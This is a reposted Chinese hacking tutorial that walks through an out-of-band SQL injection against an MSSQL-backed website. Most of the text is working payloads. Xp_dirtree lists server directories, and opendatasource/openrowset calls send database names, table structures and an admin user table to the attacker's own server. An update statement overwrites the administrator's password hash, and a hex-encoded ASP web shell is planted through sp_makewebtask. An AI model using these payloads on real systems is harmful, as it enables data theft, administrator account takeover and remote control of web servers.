日期:2011-07-05 17:26:00 来源:本站整理
Mssql反弹注射实录汇集[MSSQL防范]
本文“Mssql反弹注射实录汇集[MSSQL防范]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
某天晚上研究一个SA注射点时华B给我传来的些资料,
发上来做个记录.脑袋越来越不好用了哎
‘;update [user] set [pwd]=’1519804e89226cf9893a05d9e3fc8bbb’ where [LogonName]=’hmingming’;–
————————————————————————————–
列目录
create database test(本地履行建库)
(本地履行在上面的TEST库上建表和字段)
use test create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255))
———————————————————————————————————————————————————————
测试能否和本地数据衔接(注入点履行)
insert into openrowset('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima','select id from test.dbo.temp1') select name from master.dbo.sysdatabases--
netstat -an | find “1433″(本地履行)
create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255))–
(本地履行,在test这个数据库用查询解析器)
‘;drop table temp–(注入点履行,为的是避免和已经有的表发生冲突)
_________________________________________________________________________________
(注入点履行,建表和字段便利下面的语句插入)
‘;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255))–
———————————————————————————————————————————————————
‘;insert into temp(id,num1,num2) exec master.dbo.xp_dirtree ‘D:\www\jiage\’,1,1–
(注入点履行,列目录并插入到TEMP表中)
————————————————————————
(注入点履行,把列好的目录复制到test库的TEMP1表中)
';insert into
opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=test').test.dbo.temp1 select * from temp--
______________________________________________________________
select * from temp1(本地履行,列出了目录嘿嘿)
‘;delete temp–(注入点履行,清空数据表)
delete temp1(本地查询解析器履行,清空数据表)
鄙视黑手彭超select * from temp–竟然写成了select temp from temp–
—————————————————————————————–
猜表
(以下语句都为本地履行)
create database lcx(建库)
Create TABLE ku(name nvarchar(256) null);(建表,便利下面的查询到库名复制到这个表中)
Create TABLE biao(id int NULL,name nvarchar(256) null);(建表,便利下面的查询到的表明复制到这个表
中)/nvarchar是数据范例而256是数据长度null是没有任何记录便利鸟儿们看懂(记着我也是爱鸟)/
____________________________________________________________________________
(注入点履行,把查询到的该服务器的全部数据库名复制到方才新建的ku这个表中,去看看本地看看lcx这个数据库中的ku这个表的返回全部行吧有欣喜呦)
';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases--
__________________________________________________________________________
(注入点履行得到当前数据库名,履行前在本地清空一下上面语句留下的垃圾,什么?你不会?MYGOD delete ku本地查询解析器切换到lcx库履行)
';Insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.ku select db_name(0)--
__________________________________________________________________________________
(注入点履行,把查询到的该服务器的全部当前数据库的表名复制到方才新建的biao这个表中,去看看本地看看lcx这个数据库中的biao这个表的返回全部行吧有欣喜呦)
';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.biao select [id],[name] from sysobjects where xtype='U'--
___________________________________________________________________
(跨库查询假如查不出来是因为没有跨库查询的权限)
';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.biao select [id],[name] from JIAGE%23@HL0212_Week.dbo.sysobjects where xtype='U'--
OK(得到了库,和表那么下面我们是不是要猜内容了?想吃维生素糖果的跟我来)
_________________________________________________________________________
(本地查询解析器在LCX库履行,复制系统表syscolumns的构造到tmpcolumns便利下面的语句查询到的后果复制到tmpcolumns这个表当中)
select * into [tmpcolumns] from syscolumns where 1=2–
_________________________________________________________
(注入点履行,首先这个里注释一下id=558625033=name=user,这句意思是查询数据库为user表的全部列名并复制到tmpcolumns中)
';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.tmpcolumns select * from syscolumns where id=558625033--
/
when 34 then ”image”
when 35 then ”text”
when 52 then ”smallint”
when 56 then ‘int”
when 61 then ”datetime”
when 62 then ”float”
when 108 then ”numeric”
when 167 then ”varchar”
when 175 then ”char”
when 231 then ”nvarchar”
/
create table caonima([LogonTime] datetime null,[pwd] varchar(200) NULL,[name] varchar(200) null,[LogonName] varchar(200) null,[ZipCode] varchar(200) null);
(本地查询解析器履行,看上面的建表和这个建表有什么差别?其实一样啦只是这样对比好,
注意user表最好写成其他的表名字随便起别叫user就行因为怕系统已经存在此表和这个表冲突,
这个表不是胡乱建的follow me首先单开方才的表tmpcolumns看细心看,
假如是pwd的xtype是167那么他的数据库范例就是varchar那背面的长度就是length,
注释的够清楚了吧?不清楚我也没招儿了!)
';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.caonima select LogonTime,pwd,name,LogonName,ZipCode from [user]--
(注入点履行把查询到的后果复制到方才新建的caonima这个表中.为什么只查询3个字段呢?
认为其他东西不是敏感信息呗!为什么上面只建3个列名呢,是为了和这句对应呗!
分外注意查询的次序要和方才建表的字段次序一样.)
OK到此为止我们已经搞到了管理员用户名和密码剩下的就是破解管理员32MD5HASH,
破不了?cmd5.com要钱?我肏,我忍!改密码吧
';update [user] set [pwd]='1519804e89226cf9893a05d9e3fc8bbb' where [LogonName]='hmingming';--
(注入点履行改管理员密码,改名字为hmingming的管理员的md5
密码2264964=1519804e89226cf9893a05d9e3fc8bbb)
好了通过上面的办法我们拿到了管理员密码和用户名我们是不是就该去登陆他的后台呢?LET’S FUCK
找不到后来途径?好办用最上面的列目录找吧.
进了后台拿不拿到SHELL是您自己的事情了,我只教您若何进后台假如拿不到......忍吧!
哎,上面的这些垃圾是花了我一天的时间搞出来的,很辛劳啊,大家有钱的捧个钱场没钱的捧个人场,
这都他妈是被管理员逼出来的,本来已经拿到了网站的途径,但是死活不让backuplog,
听高垂老说是把这个权限给设置掉了,所以有了此文,万不得以千万别这样搞,
会累死人的真的.除非目标网站和你有仇.再整几句废话,天冷了加件衣服吧,
注意:上面这些办法都是在目标IIS屏蔽错误不报错的情形下搞,分外注意上面的
服务器是我的大佬们千万不要动我服务器啊,有必要说下在本地上面的用户名和密码
是SA权限的他是整个这些废话的前提所以些建SA权限的用户.
PS:高垂老说有反弹注入工具,但是人家关闭了回显不报错,工具本没没用,
假若有回显纯真是为了速度快用反弹注入工具我认为没必要
drop table cmd--
create table cmd(a char(255))--
Insert into cmd(a) values (0x3C254576616C20526571756573742822232229253E)--
execute sp_makewebtask @outputfile='D:\www\jiage\test.asp',@query='select a from cmd'--
上面的这些貌似必须是SA才能履行,DB能否可以履行不得而知,也是给大家一个
BACKUPLOG不好使的时刻用下上面这招儿
以上是“Mssql反弹注射实录汇集[MSSQL防范]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:| 本文地址: | 与您的QQ/BBS好友分享! |
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“Mssql反弹注射实录汇集”更多相关内容
中查找“Mssql反弹注射实录汇集”更多相关内容评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论